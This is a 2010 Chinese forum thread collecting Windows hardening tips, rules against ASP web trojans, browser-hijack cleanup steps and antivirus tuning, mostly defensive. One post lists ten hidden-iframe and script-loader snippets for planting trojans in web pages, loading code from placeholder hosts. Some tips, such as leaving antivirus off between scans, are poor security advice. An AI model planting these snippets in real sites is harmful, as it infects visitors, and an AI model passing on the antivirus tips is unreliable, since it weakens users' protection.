病毒扫描仪的运作方式,是把计算机上的数据与一组的病毒「签名」互相比较。每一个签名是一种病毒的特征,扫描仪在文件、电子邮件或其它地方发现数据 与签名符合时,它就认定找到病毒。但是病毒扫描仪只能扫描它所知道的病毒。保持最新的病毒扫描仪签名档案是很重要的,因为每天都有新的病毒产生。
但问题其实比这个概念还要深一点。一般而言,新的病毒在其早期的生命阶段会造成最大的损坏,正是因为很少人能够侦测到它。消息一旦传开,指出有新的 病毒在散布,然后人们更新手上的病毒签名文件,之后病毒的散布程度就大幅下降。重点是要赶在散布曲线的前端,意即病毒大肆散布前,在计算机上更新病毒签名 文件。
事实上每一家防毒软件的供货商都提供由网站取得免费签名文件的方式。其实,许多厂商已经「推进」他们的服务,每当新的签名文件发行时,他们会传送通 知。请您善加利用这些服务,同时,也要持续使用这些服务,让扫描仪本身 (也就是扫描软件) 更新。病毒的建立者会定期发展新的技术,使得扫描仪本身运作的方式也有变更的需要。
法则9:完全的匿名不管在现实或网络上都不实际。
所有人类的互动都涉及某种的数据交换。如果有人组合足够的数据,他们就可以识别您。仔细想想一个人在与您简短的对谈中能够收集的所有信息。只要看一 眼,他们就可以判断您的身高、体重与大概的年纪。您的口音可能会告诉他们您来自哪个国家,或是来自国内的哪一区域。如果您谈话的内容不是只有天气,您可能 会告诉他们一些与您的家庭、兴趣、住处与以何维生有关的事情。他人要了解您是谁,并不需要花很长的时间收集信息。如果您渴望绝对的隐姓埋名,最好的方式是 住在山洞里,不与任何人接触。
在因特网上的情形也是一样。如果您浏览一个网站,网站拥有者如果有心,他就有办法查出您的身份。毕竟由 0 与 1 所组成的网站工作阶段,一定能够找到通往目的地的路,而那个目的地就是您的计算机。有很多的方式可以掩饰位,例如,您可以使用网络地址转译,为您实际的 IP 地址加上屏障;订阅匿名服务将位,由以太网络的一端转送到另一端,以掩饰您的位;为其它目的使用别家的 ISP 账户;只从公共信息站浏览特定的网站等等。这些方式让人更难判定您的身份,但并非全无可能。您确定知道是谁在操作这些匿名的服务吗?可能就是您刚浏览之网 站的拥有者!您昨天浏览提供您 10 元折价券的无害网站呢?或许该网站的拥有者愿意与其它网站拥有者共享您的数据。如果是这样,第二个网站所有者或许可以把两个网站的信息相互关联,进而判定 您的身份。
难道这代表网络上的隐私权是不可能的吗?一点也不。那意味着在因特网上保护您隐私的最好方式,与保护您日常生活的隐私没有不同-都是经由您的行为。 阅读您浏览网站的隐私权声明,并且只与您能接受其做法的网站交易。如果您担心 cookie,就停用该功能。最重要的是,请避免毫无选择地浏览网站-如同绝大多数的城市都有治安不好的区域,因特网也是一样。但是如果您要的是彻底与全 面的匿名,还是着手找一个山洞比较好。
法则10:技术不是万能药。
技术能够做到令人惊奇的事情。近年来,前所未有的廉价、更具威力的硬件与利用硬件的软件日渐开发,因而为计算机使用者、加密技术的发展与其它科学打开了新的领域。如果我们努力研究的程度足够,很难不相信技术可以带来一个没有风险的世界。但是这完全是不实际的。
完美的安全性需要一层不存在的极至境界,而事实上也不太可能存在。这对软件与人类有兴趣的所有领域而言都是事实。软件开发是一个不完美的科学,所有 的软件都有问题,其中有些可被利用而造成安全性漏洞,那不过是严酷的生活现实面。即使软件能够做到十全十美,还是无法解决所有的问题。就某个程度而言,大 部分的攻击牵涉到人性的操纵-这通常称为社交工程学 (social engineering)。增加成本与攻击安全性技术的困难度,动机不良之士会将焦点由技术转向在控制台的人,作为响应。了解您在维护坚固安全性的角色很 重要,否则您可能会成为自己系统保护的裂缝。
解决方法在于认知两个重要的部分。第一,安全性是由技术与政策两者所组成,也就是说,组合技术与使用它的方法,最终会决定您系统安全的程度。第二, 安全性是一个过程而不是目的,它不是一个可以一次永远解决的问题,而是好人与坏人之间一连串的行动与对抗。关键是要确定您有良好的安全性意识与稳健的 判断力。有许多资源可以帮助您做到这个目标,举例来说,Microsoft Security网站有几百页的白皮书、最佳实例指南、检查清单与工具,而且不断在开发更多的资源。结合卓越的技术与稳健的判断力,您将拥有固若盘石的安全性。
流浪●剑尊 - 2010-3-14 19:44:00
个人电脑 安全技巧20招(一)
简介:
谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种:
(1) 被他人盗取密码;
(2) 系统被木马攻击;
(3) 浏览网页时被恶意的java scrpit程序攻击;
(4) QQ被攻击或泄漏信息;
(5) 病毒感染;
(6) 系统存在漏洞使他人攻击自己。
(7) 黑客的恶意攻击。
下面我们就来看看通过什么样的手段来更有效的防范攻击。
要点浏览:
1.察看本地共享资源
2.删除共享(每次输入一个)
3.删除ipc$空连接
4.关闭自己的139端口,ipc和RPC漏洞存在于此..
5.防止rpc漏洞
6.445端口的关闭
7.3389的关闭
8.4899的防范
9.禁用服务
10.账号密码的安全原则
主要内容:
TOP.1 察看本地共享资源
察看本地共享资源
运行CMD输入net share,如果看到有异常的共享,那么应该关闭。但是有时你关闭共享下次开机的时候又出现了,那么你应该考虑一下,你的机器是否已经被黑客所控制了,或者中了病毒。
TOP.2 删除共享(每次输入一个)
删除共享(每次输入一个)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
TOP.3 删除ipc$空连接
删除ipc$空连接
在运行内输入regedit,在注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 项里数值名称RestrictAnonymous的数值数据由0改为1。
TOP.4 关闭自己的139端口,ipc和RPC漏洞存在于此。
关闭自己的139端口,ipc和RPC漏洞存在于此。
关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
TOP.5 防止rpc漏洞
防止rpc漏洞
打开管理工具——服务——找到RPC(Remote Procedure Call (RPC) Locator)服务——将故障恢复中的第一次失败,第二次失败,后续失败,都设置为不操作。
XP SP2和2000 pro sp4,均不存在该漏洞。
TOP.6 445端口的关闭
445端口的关闭
修改注册表,添加一个键值
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为 0这样就ok了
TOP.7 3389的关闭
3389的关闭
XP:我的电脑上点右键选属性--> 远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
Win2000server 开始--> 程序--> 管理工具--> 服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。(该方法在XP同样适用)
使用2000 pro的朋友注意,网络上有很多文章说在Win2000pro 开始--> 设置--> 控制面板--> 管理工具--> 服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务,可以关闭3389,其实在2000pro 中根本不存在Terminal Services。
TOP.8 4899的防范
4899的防范
网络上有许多关于3389和4899的入侵方法。4899其实是一个远程控制软件所开启的服务端端口,由于这些控制软件功能强大,所以经常被黑客用来控制自己的肉鸡,而且这类软件一般不会被杀毒软件查杀,比后门还要安全。
4899不象3389那样,是系统自带的服务。需要自己安装,而且需要将服务端上传到入侵的电脑并运行服务,才能达到控制的目的。
所以只要你的电脑做了基本的安全配置,黑客是很难通过4899来控制你的。
TOP.9 禁用服务
禁用服务
打开控制面板,进入管理工具——服务,关闭以下服务
1.Alerter[通知选定的用户和计算机管理警报]
2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享
4.Distributed Link Tracking Server[适用局域网分布式链接? ?踪客户端服务]
5.Human Interface Device Access[启用对人体学接口设备(HID)的通用输入访问]
6.IMAPI CD-Burning COM Service[管理 CD 录制]
7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
8.Kerberos Key Distribution Center[授权协议登录网络]
9.License Logging[监视IIS和SQL如果你没安装IIS和SQL的话就停止]
10.Messenger[警报]
11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
14.Print Spooler[打印机服务,没有打印机就禁止吧]
15.Remote Desktop Help& nbsp;Session Manager[管理并控制远程协助]
16.Remote Registry[使远程计算机用户修改本地注册表]
17.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]
18.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
19.Special Administration Console Helper[允许管理员使用紧急管理服务远程访问命令行提示符]
20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持而使用户能够共享文件、打印和登录到网络]
21.Telnet[允许远程用户登录到此计算机并运行程序]
22.Terminal Services[允许用户以交互方式连接到远程计算机]
23.Window s Image Acquisition (WIA)[照相服务,应用与数码摄象机]
如果发现机器开启了一些很奇怪的服务,如r_server这样的服务,必须马上停止该服务,因为这完全有可能是黑客使用控制程序的服务端。
TOP.10 账号密码的安全原则
账号密码的安全原则
首先禁用guest帐号,将系统内建的administrator帐号改名~~(改的越复杂越好,最好改成中文的),而且要设置一个密码,最好是8位以上字母数字符号组合。 (让那些该死的黑客慢慢猜去吧~)
如果你使用的是其他帐号,最好不要将其加进administrators,如果加入administrators组,一定也要设置一个足够安全的密码,同上如果你设置adminstrator的密码时,最好在安全模式下设置,因为经我研究发现,在系统中拥有最高权限的帐号,不是正常登陆下的adminitrator帐号,因为即使有了这个帐号,同样可以登陆安全模式,将sam文件删除,从而更改系统的administrator的密码!而在安全模式下设置的administrator则不会出现这种情况,因为不知道这个administrator密码是无法进入安全模式。权限达到最大这个是密码策略:用户可以根据自己的习惯设置密码,下面是我建议的设置(关于密码安全设置,我上面已经讲了,这里不再罗嗦了。
打开管理工具.本地安全设置.密码策略
1.密码必须符合复杂要求性.启用
2.密码最小值.我设置的是8
3.密码最长使用期限.我是默认设置42天
4.密码最短使用期限0天
5.强制密码历史 记住0个密码
6.用可还原的加密来存储密码 禁用
TOP.11 本地策略:
本地策略:
这个很重要,可以帮助我们发现那些心存叵测的人的一举一动,还可以帮助我们将来追查黑客。
(虽然一般黑客都会在走时会清除他在你电脑中留下的痕迹,不过也有一些不小心的) 打开管理工具
找到本地安全设置.本地策略.审核策略
1.审核策略更改 成功失败
2.审核登陆事件 成功失败
3.审核对象访问 失败
4.审核跟踪过程 无审核
5.审核目录服务访问 失败
6.审核特权使用 失败
7.审核系统事件 成功失败
8.审核帐户登陆时间 成功失败
9.审核帐户管理 成功失败
然后再到管理工具找到
事件查看器
应用程序:右键> 属性> 设置日志大小上限,我设置了50mb,选择不覆盖事件
安全性:右键> 属性> 设置日志大小上限,我也是设置了50mb,选择不覆盖事件
系统:右键> 属性> 设置日志大小上限,我都是设置了50mb,选择不覆盖事件
TOP.12 本地安全策略:
本地安全策略:
打开管理工具
找到本地安全设置.本地策略.安全选项
1.交互式登陆.不需要按 Ctrl Alt Del 启用 [根据个人需要,? 但是我个人是不需要直接输入密码登陆的]
2.网络访问.不允许SAM帐户的匿名枚举 启用
3.网络访问.可匿名的共享 将后面的值删除
4.网络访问.可匿名的命名管道 将后面的值删除
5.网络访问.可远程访问的注册表路径 将后面的值删除
6.网络访问.可远程访问的注册表的子路径 将后面的值删除
7.网络访问.限制匿名访问命名管道和共享
8.帐户.(前面已经详细讲过)
TOP.13 用户权限分配策略:
用户权限分配策略:
打开管理工具
找到本地安全设置.本地策略.用户权限分配
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID
2.从远程系统强制关机,Admin帐户也删除,一个都不留
3.拒绝从网络访问这台计算机 将ID删除
4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务
5.通过远端强制关机。删掉
TOP.14 终端服务配置
终端服务配置
打开管理工具
终端服务配置
1.打开后,点连接,右键,属性,远程控制,点不允许远程控制
2.常规,加密级别,高,在使用标准Windows验证上点√!
3.网卡,将最多连接数上设置为0
4.高级,将里面的权限也删除.[我没设置]
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话 TOP.15 用户和组策略
用户和组策略
打开管理工具
计算机管理.本地用户和组.用户;
删除Support_388945a0用户等等
只留下你更改好名字的adminisrator权限
计算机管理.本地用户和组.组
组.我们就不分组了
TOP.16 自己动手DIY在本地策略的安全选项
自己动手DIY在本地策略的安全选项
1)当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透.
2)登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.
3)对匿名连接的额外限制
4)禁止按 alt CRTl del(没必要)
5)允许在未登陆前关机[防止远程关机/启动、强制关机/启动]
6)只有本地登陆用户才能访问CD-ROM
7)只有本地登陆用户才能访问软驱
8)取消关机原因的提示
A、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面;
B、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框;
C、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机;
D4、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。
9)禁止关机事件跟踪
开始“Start -> ”运行“ Run -> 输入”gpedit.msc “,在出现的窗口的左边部分,选择 ”计算机配置“(Computer Configuration )-> ”管理模板“(Administrative Templates)-> ”系统“(System),在右边窗口双击“Shutdown Event Tracker” 在出现的对话框中选择“禁止”(Disabled),点击然后“确定”(OK)保存后退出这样,你将看到类似于Windows 2000的关机窗口
TOP.17 常见端口的介绍
常见端口的介绍
TCP
21 FTP
22 SSH
23 TELNET
25 TCP SMTP
53 TCP DNS
80 HTTP
135epmap
138[冲击波]
139smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWHERE
5632 UDP PCANYWHERE
3389 Terminal Services
4444[冲击波]
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
关于UDP一般只有腾讯QQ会打开4000或者是8000端口或者8080,那么,我们只运 行本机使用4000这几个端口就行了
TOP.18 另外介绍一下如何查看本机打开的端口和tcp\ip端口的过滤
另外介绍一下如何查看本机打开的端口和tcp\ip端口的过滤
开始--运行--cmd
输入命令netstat -a
会看到例如(这是我的机器开放的端口)
Proto Local AddressForeign AddressState
TCPyf001:epmap yf001:0 LISTE
TCPyf001:1025(端口号)yf001:0 LISTE
TCP(用户名)yf001:1035yf001:0 LISTE
TCPyf001:netbios-ssn yf001:0 LISTE
UDPyf001:1129*:*
UDPyf001:1183*:*
UDPyf001:1396*:*
UDPyf001:1464*:*
UDPyf001:1466*:*
UDPyf001:4000*:*
UDPyf001:4002*:*
UDPyf001:6000*:*
UDPyf001:6001*:*
UDPyf001:6002*:*
UDPyf001:6003*:*
UDPyf001:6004*:*
UDPyf001:6005*:*
UDPyf001:6006*:*
UDPyf001:6007*:*
UDPyf001:1030*:*
UDPyf001:1048*:*
UDPyf001:1144*:*
UDPyf001:1226*:*
UDPyf001:1390*:*
UDPyf001:netbios-ns *:*
UDPyf001:netbios-dgm *:*
UDPyf001:isakmp *:*
现在讲讲基于Windows的tcp/ip的过滤
控制面板——网络和拨号连接——本地连接——INTERNET协议(tcp/ip)--属性--高级---选项-tcp/ip筛选--属性!!
然后添加需要的tcp 和UDP端口就可以了~如果对端口不是很了解的话,不要轻易进行过滤,不然可能会导致一些程序无法使用。
TOP.19 胡言乱语
胡言乱语
(1)、TT浏览器
选择用另外一款浏览器浏览网站.我推荐用TT,使用TT是有道理的。
TT可以识别网页中的脚本,JAVA程序,可以很好的抵御一些恶意的脚本等等,而且TT即使被感染,你删除掉又重新安装一个就是。
MYIE浏览器
是一款非常出色的浏览器,篇幅有限,不做具体介绍了。(建议使用)
(2)、移 动“我的文档”
进入资源管理器,右击“我的文档”,选择“属性”,在“目标文件夹”选项卡中点“移 动”按钮,选择目标盘后按“确定”即可。在Windows 2003 中“我的文档”已难觅芳踪,桌面、开始等处都看不到了,建议经常使用的朋友做个快捷方式放到桌面上。
3)、移 动IE临时文件
进入“开始→控制面板→Internet 选项”,在“常规”选项“Internet 文件”栏中点“设置”按钮,在弹出窗体中点“移 动文件夹”按钮,选择目标文件夹后,点“确定”,在弹出对话框中选择“是”,系统会自动重新登录。点本地连接> 高级> 安全日志,把日志的目录更改专门分配日志的目录,不建议是C:再重新分配日志存储值的大小,我是设置了10000KB。
TOP.20 避免被恶意代码 木马等病毒攻击
避免被恶意代码 木马等病毒攻击
以上主要讲怎样防止黑客的恶意攻击,下面讲避免机器被恶意代码,木马之类的病毒攻击。
其实方法很简单,所以放在最后讲。
我们只需要在系统中安装杀毒软件
如 卡巴基斯,瑞星,金山独霸等
还有防止木马的木马克星和金山的反木马软件(可选)
并且能够及时更新你的病毒定义库,定期给你的系统进行全面杀毒。杀毒务必在安全模式下进行,这样才能有效清除电脑内的病毒以及驻留在系统的非法文件。
还有就是一定要给自己的系统及时的打上补丁,安装最新的升级包。微软的补丁一般会在漏洞发现半个月后发布,而且如果你使用的是中文版的操作系统,那么至少要等一个月的时间才能下到补丁,也就是说这一个月的时间内你的系统因为这个漏洞是很危险的。
本人强烈建议个人用户安装使用防火墙(目前最有效的方式)
例如:天网个人防火墙、诺顿防火墙、瑞星防火墙等等。
因为防火墙具有数据过滤功能,可以有效的过滤掉恶意代码,和阻止DDOS攻击等等。总之如今的防火墙功能强大,连漏洞扫描都有,所以你只要安装防火墙就可以杜绝大多数网络攻击,但是就算是装防火墙也不要以为就万事无忧。因为安全只是相对的,如果哪个邪派高手看上你的机器,防火墙也无济于事。我们只能尽量提高我们的安全系数,尽量把损失减少到最小。
安全意识也很重要,我们平时上网的时候都应该有一个好的安全意识。加上我们的不懈努力,相信我们的网络生活会更美好。
流浪●剑尊 - 2010-3-14 19:44:00
网站 防范ASP木马的十大基本原则
由于ASP它本身是服务器提供的一贡服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求.
我们首先来说一下怎么样防范好了,说到防范我们自然要对asp木马的原理了,大道理我也不讲了,网上的文章有的是,简单的说asp木马其实就是用asp编写的网站程序,甚至有些asp木马就是由asp网站管理程序修改而来的。就比如说我们常见的asp站长助手,等等
它和其他asp程序没有本质区别,只要是能运行asp的空间就能运行它,这种性质使得asp木马非常不易被发觉。它和其他asp程序的区别只在于asp木马是入侵者上传到目标空间,并帮助入侵者控制目标空间的asp程序。严重的从而获取服务器管理员的权限,要想禁止asp木马运行就等于禁止asp的运行,显然这是行不通的,这也是为什么asp木马猖獗的原因!有人要问了,是不是就没有办法了呢,不,有办法的:
第一:从源头入手,入侵者是怎么样上传asp木马的呢?一般哟几种方法,通过sql注射手段,获取管理员权限,通过备份数据库的功能将asp木马写入服务器。或者进入后台通过asp程序的上传功能的漏洞,上传木马等等,当然正常情况下,这些可以上传文件的asp程序都是有权限限制的,大多也限制了asp文件的上传。(比如:可以上传图片的新闻发布、图片管理程序,及可以上传更多类型文件的论坛程序等),如果我们直接上传asp木马的话,我们会发现,程序会有提示,是不能直接上传的,但由于存在人为的asp设置错误及asp程序本身的漏洞,给了入侵者可乘之机,实现上传asp木马。
因此,防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上,如果你是用别人的程序的话,尽量用出名一点的大型一点的程序,这样漏洞自然就少一些,而且尽量使用最新的版本,并且要经常去官方网站查看新版本或者是最新补丁,还有就是那些数据库默认路径呀,管理员密码默认呀,一定要改,形成习惯保证程序的安全性。
那么如果你是程序员的话,我还想说的一点就是我们在网站程序上也应该尽量从安全的角度上编写涉及用户名与口令的程序最好封装在服务器端,尽量少的在ASP文件里出现,涉及到与数据库连接地用户名与口令应给予最小的权限; 需要经过验证的ASP页面,可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个页面。防止ASP主页.inc文件泄露问题; 防止UE等编辑器生成some.asp.bak文件泄露问题等等特别是上传功能一定要特别注意
上面的只是对客户的一些要求,但是空间商由于无法预见虚拟主机用户会在自己站点中上传什么样的程序,以及每个程序是否存在漏洞,因此无法防止入侵者利用站点中客户程序本身漏洞上传asp木马的行为。空间商只能防止入侵者利用已被入侵的站点再次入侵同一服务器上其他站点的行为。这也更加说明要防范asp木马,虚拟主机用户就要对自己的程序严格把关! 为此我总结了ASP木马防范的十大原则供大家参考:
网站 防范ASP木马的十大基本原则
1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。
2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的asp都要进行身份认证!
3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。电脑知识
4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。
5、要尽量保持程序是最新版本。
6、不要在网页上加注后台管理程序登陆页面的链接。
7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。
8、要时常备份数据库等重要文件。
9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换一分安全!
10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。
重新上传文件前,所有asp程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。
做好以上防范措施,您的网站只能说是相对安全了,决不能因此疏忽大意,因为入侵与反入侵是一场永恒的战争.
流浪●剑尊 - 2010-3-14 19:45:00
电脑常见挂马代码大全
做网站的人知道也不小心网站就被黑客挂了木马那个头痛呀!首先引起了网友的反感。从些不在上自己的网站。搜索还惩罚,真是倒霉呀。下面我们就了解一下,网站是如何中毒的。
一:框架挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀 电脑知识
四:body挂马
<body ></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
流浪●剑尊 - 2010-3-14 19:45:00
三种恶意网页病毒的表现形式及清除方法
在我们使用电脑的过程中,经常会发现这样一幕:打开IE浏览器后,自动进入了一个xxx,随之打开了一系列的站点和小窗口,最后导致电脑资源严重不足,不得不重新启动电脑。这到底是什么在做怪呢?这就是我们所不熟悉的网页病毒。
目前,大部分杀毒软件对网页病毒的预防性能不太好,因此导致很多用户中毒,而且杀毒软件查不出病毒所在。对于网页病毒,我们一般手动来清除网页病毒。
目前,常见的网页病毒主要有以下几种:
一、默认主页被修改
1、病毒特征:默认的主页被修改成某一网站的地址
2、表现形式:IE浏览器的默认主页被修改成为http://www.***.com,而且收藏夹中也加入了一些非法的站点。IE浏览器被修改后的主页,是一些黄色非法站点,打开IE后会不断打开下一级网页,还有一些广告窗口,使计算机资源耗尽。
3、清除方法:
①我们要看一下被病毒修改后的主页地址是多少,记录下来。
②打开“控制面板”中的“Internet选项”,在“Internet选项”“常规”中,找到“Internet临时文件”菜单,选择“删除Cookies(I)”和“删除文件”菜单,将IE的临时文件和所有的Cookies删除。
③在“开始”菜单中“运行”中输入“Regedit”打开注册表编辑器,查找注册表Run下面的键值。打开注册表编辑器,查找HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run选项,在右面空白处查找加载的ttp://www.***.com选项并删除。
④在注册表编辑器中,使用查找命令,查找http://www.***.com(该键值就是被病毒修改后的主页地址,为了防止用户中毒,特用*代替中间的字母,下同)键值并删除。重新查找整个注册表中的http://www.***.com键值并删除,然后退出注册表编辑器。
4、危害程度:一般
二、主页设置被屏蔽锁定,且设置选项无效不可更改
1、病毒特征:将IE浏览器主页设置禁用
2、表现形式:IE的主页被修改为http://www.***.com,IE浏览器“Internet选项”“常规”选项中的“主页”变成了灰色,无法更改当前的主页。
3、清除方法:在“开始”菜单的“运行”中输入“Regedit”打开注册表编辑器,查找:HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\分支,新建“ControlPanel”主键,然后在此主键下新建键值名为“HomePage”的DWORD值,值为“00000000”,按F5键刷新生效。
4、清除IE浏览器的临时文件和Cookies文件。
5、危害程序:中等
三、QQ尾巴病毒
1、病毒特征:这种病毒并不是利用QQ本身的漏洞进行传播。它其实是在某个网站首页上嵌入了一段恶意代码,利用IE的iFrame系统漏洞自动运行恶意木马程序,从而达到侵入用户系统,进而借助QQ进行垃圾信息发送的目的。中毒后在用户使用QQ向好友发送信息的时候,该木马程序会自动在发送的消息末尾插入一段广告词。
2、表现形式:机器中毒后,在运行QQ聊天时,会自动向QQ中的好友发送以下信息,
①HoHo~~
http://www.mm**.com刚才朋友给我发来的这个东东。你不看看就后悔哦,嘿嘿。也给你的朋友吧。
②呵呵,其实我觉得这个网站真的不错,你看看
http://www.ktv***.com/
③http://ni***.126.com 看看啊. 我最近照的照片~ 才扫描到网上的。看看我是不是变了样?
这些信息加载到聊天内容后,当用户接收到消息后,有的用户出于好奇,打开了上面的网址,结果中毒,成为下一个病毒传播者。由于QQ用户众多,因此这个病毒传播速度比较快。
3、清除方法:
①在“运行”中输入“msconfig”,找到“启动”选项,查找其中的可疑启动选项。
②将可疑文件名字记录下来,用“查找”菜单在“我的电脑”中查找这些程序,将查找到的程序删除。
③利用上面叙述的方法,将IE浏览器的设置恢复,并删除注册表中加载的可疑程序,名字参考在Msconfig中得到的程序名字。
④ 检查“开始”菜单“程序”中的“启动”选项,看是否有可疑程序并加载。如果有可疑程序,记录下名字,并删除快捷方式用源程序。
⑤安装IE的补丁程序,重新启动计算机。
总结:
机器只要中毒,就会体现在系统的进程中,记录下这些可疑的进程名字,查找所有程序并删除。然后再去注册表中,修改被病毒修改的键值,就一定可以将病毒清除。对于变种病毒,需要进行多次反复操作,才能清除病毒。要想做到准确判断哪些程序是病毒,需要熟悉正常运行的电脑中,进程有哪些,大概占用多少系统资源。建议在系统做好后,对系统进程截图保存,还有Msconfig中的启动选项也截图保存,有利于日后判断病毒!
流浪●剑尊 - 2010-3-14 19:46:00
杀毒软件拖慢电脑的原因分析
杀毒软件需要在内存或文件里寻找病毒特征。这是庞大的计算量,对低配置机器的速度影响很明显。
除了占用CPU资源之外,杀毒软件需要在程序运行、文件打开/保存的时候进行额外的磁盘读取操作。频繁的硬盘读取阻塞了其他程序和虚拟内存的硬盘读写操作,使得CPU和整机都必须进行等待,从而拖住了机器。
1.杀毒软件的优化使用
a.消除无谓的扫描操作
将没有病毒威胁的文件排除在扫描检查范围之外,将极大减轻杀毒软件对系统造成的压力和延时,有效提高整机运行效率。
由于并非所有文件都能造成病毒传播;同时即使电脑内有了病毒的原始数据,它也需要获得被运行的机会才可能激活。因此,在正常情况下,以下内容应尽量排除在杀毒软件的查杀范围之外:
压缩文档: *.rar / *.zip / *.cab / *.gz
说明:如果压缩包中真的带有病毒,它们只有在解压缩后才有可能被运行。而在解压缩的时候,开启实时防护功能的杀毒软件就已经将病毒清除了,因此压缩包中的病毒并不会造成危害。
由于解压缩是高强度计算过程,因此取消对压缩文件的扫描将有效降低杀毒软件的CPU占用率。
QQ聊天记录: *.db
QQ聊天中,这个数据文件被反复修改,因此也被杀毒软件反复扫描,严重影响了硬盘性能。这类文件不是病毒,不取消扫描更待何时!(*.db也可能是其他软件的数据库文件)
庞大的媒体文件: *.wav / *.mp3 / *.bmp / *.tif
这些庞大的媒体文件也不是病毒。取消他们的扫描可以加快文件夹的打开速度。
*.ttc / *.ttf / *.txt
这些文件可以排除扫描,但已经不是主要问题了。更多需要排除的工作数据可以搜索硬盘上>2MB的文件,视情形排除(比如你是美工,那你还可能需要将*.psd排除在外)。
2.减少手工扫描的开销
全部扫描所有磁盘会花掉非常多的时间,平时也没有必要这样做。
一般情况下,扫描系统盘、其他盘的Program Files目录、下载软件集中存放的目录就可以了。通常,如果有病毒,多数情况下一两分钟就会有反映(通常在扫描windows目录就报警了)。
如果你感到机器有异常,那么再进行全面的扫描。
2.安全防护的高手用法
即使用了前面的方法,杀毒软件仍然会对系统速度造成一定影响。杀毒能力较高的用户往往有他们独特的用法。
a.间歇性查毒
很多高手平时并不开启杀毒软件,仅在感到异常时才用他们来检查一下。
普通用户也可以学习这种做法,平时不开杀毒软件,每过一两个星期抽空闲时间集中扫描一次。这样,平时电脑的速度就有保证了。
